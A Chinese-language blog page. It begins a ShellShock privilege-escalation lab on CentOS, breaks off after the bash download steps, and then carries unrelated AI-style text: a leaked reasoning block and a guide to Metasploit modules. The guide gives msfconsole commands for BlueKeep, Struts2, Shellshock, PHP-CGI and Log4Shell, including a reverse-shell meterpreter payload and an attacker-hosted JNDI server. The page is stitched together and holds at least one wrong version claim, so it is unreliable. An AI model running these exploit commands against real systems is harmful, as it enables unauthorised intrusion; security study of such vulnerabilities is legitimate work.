关于ShellShock漏洞的利用过程和原理解析

本文详细介绍了ShellShock漏洞的利用过程,包括检查bash版本、利用漏洞获取root权限、安装GCC编译利用代码,以及漏洞原理的简单解析。通过环境变量的特殊构造,bash在读取时执行了未授权的代码,导致权限提升。

0x00

今天本是应该休息和打LOL的日子,但是我那个敬业的舍友非要拿python写个跟Siri类似的东西。好吧我也来学习学习

晚上来研究下这个14年出现并且自家产品能防护住的漏洞---ShellShock
这是Bashshell中的一个漏洞,使得攻击者能在小于等于4.1版本的Bash上进行任意代码执行
 
实验环境:Centos 6.7

实验目的:获取root权限


0x01
先检查了下自己的bash版本是不是小于4.1
如果不是则通过下边的步骤进行修改
#wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
#tar xf bash-4.1.tar.gz
#cd bash-4.1

<think>我们正在回答用户关于MetasploitFramework经典漏洞利用模块的问题,除了永恒之蓝(MS17-010)之外,用户希望了解其他经典模块。根据引用[2]引用[3]的内容,我们可以知道Metasploit框架中的漏洞利用模块(exploits)是攻击流程的核心,而payloads、auxiliary等模块则配合使用。因此,我们可以列举一些历史上著名的漏洞利用模块,这些漏洞影响广泛,在Metasploit中也有对应的利用模块。注意:引用[1]提到永恒之蓝漏洞利用时可能出现蓝屏,说明漏洞利用的稳定性可能存在问题,但其他经典模块同样可能存在类似问题。下面列举几个经典漏洞利用模块:1.**CVE-2019-0708 (BlueKeep)**:这是一个影响Windows远程桌面服务(RDP)的严重漏洞,与永恒之蓝类似,可以在无需用户交互的情况下实现远程代码执行。Metasploit中提供了多个利用模块,例如`exploit/windows/rdp/cve_2019_0708_bluekeep_rce`。2.**CVE-2017-0143 (EternalRomance)**:这是SMB协议中的另一个漏洞,属于永恒系列漏洞之一,影响SMBv1。模块路径:`exploit/windows/smb/ms17_010_eternalromance`。3.**CVE-2014-0160 (Heartbleed)**:心脏滴血漏洞,影响OpenSSL。该漏洞允许攻击者读取受保护的内存内容,从而可能获取敏感信息(如私钥)。Metasploit中的模块:`auxiliary/scanner/ssl/openssl_heartbleed`(注意这是一个辅助模块,用于信息泄露,不是直接获取shell利用模块,但后续可以结合获取的信息进行进一步攻击)。4.**CVE-2012-1823 (PHP-CGI漏洞)**:影响PHP的远程代码执行漏洞,模块路径:`exploit/multi/http/php_cgi_arg_injection`。5.**CVE-2010-3333 (Microsoft WordRTF栈溢出漏洞)**:通过恶意RTF文件实现远程代码执行,模块路径:`exploit/windows/fileformat/ms10_087_rtf_pfragments_bof`。6. **CVE-2008-4250 (MS08-067)**:这是另一个经典的WindowsSMB漏洞,在永恒之蓝之前被广泛利用。模块路径:`exploit/windows/smb/ms08_067_netapi`。7.**CVE-2017-8464 (LNK漏洞)**:通过恶意LNK文件实现远程代码执行,模块路径:`exploit/windows/fileformat/cve_2017_8464_lnk_rce`。8.**CVE-2019-19781 (CitrixADC/Netscaler漏洞)**:影响Citrix应用交付控制器网关的漏洞,可导致远程代码执行。模块路径:`exploit/linux/http/citrix_dir_traversal_rce`。9.**CVE-2021-44228 (Log4Shell)**: Log4j2远程代码执行漏洞,影响广泛。模块路径:`exploit/multi/http/log4shell_header_injection`。10.**CVE-2020-1472 (ZeroLogon)**: Netlogon特权提升漏洞,允许攻击者获取域管理员权限。模块路径:`auxiliary/admin/dcerpc/cve_2020_1472_zerologon`(这是一个辅助模块,用于重置域控密码,然后配合其他攻击手段)。注意:以上漏洞利用模块在Metasploit中的路径可能会随着版本更新而变化,使用时请先搜索确认。在回答中,我们按照漏洞的CVE编号名称进行列举,并简要说明漏洞影响模块路径。同时,我们根据引用[2][3]的内容,提醒用户Metasploit模块的分类(如exploit、auxiliary)以及使用注意事项。最后,我们生成相关问题。</think>### Metasploit Framework 经典漏洞利用模块(除永恒之蓝外) Metasploit Framework 包含大量经典漏洞利用模块,以下是影响力较大的案例及其技术原理--- #### **1. CVE-2019-0708 (BlueKeep)** - **漏洞类型**:Windows 远程桌面服务(RDP)远程代码执行 - **危害**:无需用户交互即可获得SYSTEM权限 - **利用模块**: ```bash use exploit/windows/rdp/cve_2019_0708_bluekeep_rce set RHOSTS [目标IP] set PAYLOAD windows/x64/meterpreter/reverse_tcp exploit ``` - **技术特点**:通过畸形RDP协议数据触发内核级内存损坏[^2] - **影响范围**:Windows 7/2008 R2及更早系统 --- #### **2. CVE-2017-5638 (Apache Struts2)** - **漏洞类型**:OGNL表达式注入 - **危害**:通过HTTP头实现远程命令执行 - **利用模块**: ```bash use exploit/multi/http/struts2_content_type_ognl set RHOSTS [目标URL] set TARGETURI /login.action set CMD "whoami" # 直接执行系统命令 exploit ``` - **技术特点**:利用Content-Type头注入恶意OGNL表达式[^3] - **著名案例**:导致Equifax 1.43亿用户数据泄露 --- #### **3. CVE-2014-6271 (Shellshock)** - **漏洞类型**:Bash环境变量注入 - **危害**:通过CGI接口实现系统命令执行 - **利用模块**: ```bash use exploit/multi/http/apache_mod_cgi_bash_env_exec set RHOSTS [目标IP] set TARGETURI /cgi-bin/test.sh exploit ``` - **技术特点**:利用Bash解析函数定义时的代码执行缺陷 - **影响范围**:Unix/Linux系统(2014年影响全球5亿设备) --- #### **4. CVE-2012-1823 (PHP-CGI漏洞)** - **漏洞类型**:PHP-CGI参数注入 - **危害**:通过查询字符串执行系统命令 - **利用模块**: ```bash use exploit/multi/http/php_cgi_arg_injection set RHOSTS [目标IP] set TARGETURI /php-cgi exploit ``` - **技术特点**:利用`?-s`等参数直接暴露源码或执行命令[^2] --- #### **5. CVE-2021-44228 (Log4Shell)** - **漏洞类型**:Log4j JNDI注入 - **危害**:通过日志记录功能实现RCE - **利用模块**: ```bash use exploit/multi/http/log4shell_header_injection set RHOSTS [目标URL] set HTTP_HEADER "User-Agent" # 注入点 set SRVHOST [攻击机IP] exploit ``` - **技术特点**:利用${jndi:ldap://}协议加载远程恶意类 --- ### 漏洞利用模块分类 根据引用[2]的框架定义: 1. **远程利用(exploit)** - 如`exploit/unix/ftp/vsftpd_234_backdoor` 2. **客户端攻击** - 如`exploit/windows/browser/ms10_046_shortcut_icon_dllloader` 3. **辅助扫描(auxiliary)** - 如`auxiliary/scanner/http/tomcat_mgr_login` > **注**:所有利用需遵守法律授权,测试前务必确认目标系统合规性[^1]。 --- ### 相关问题 1. **如何防御BlueKeep漏洞攻击?** 2. **Metasploit中如何检测Apache Struts2漏洞?** 3. **Shellshock漏洞在现代系统中是否仍然有效?** 4. **Log4Shell漏洞利用需要哪些先决条件?**
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值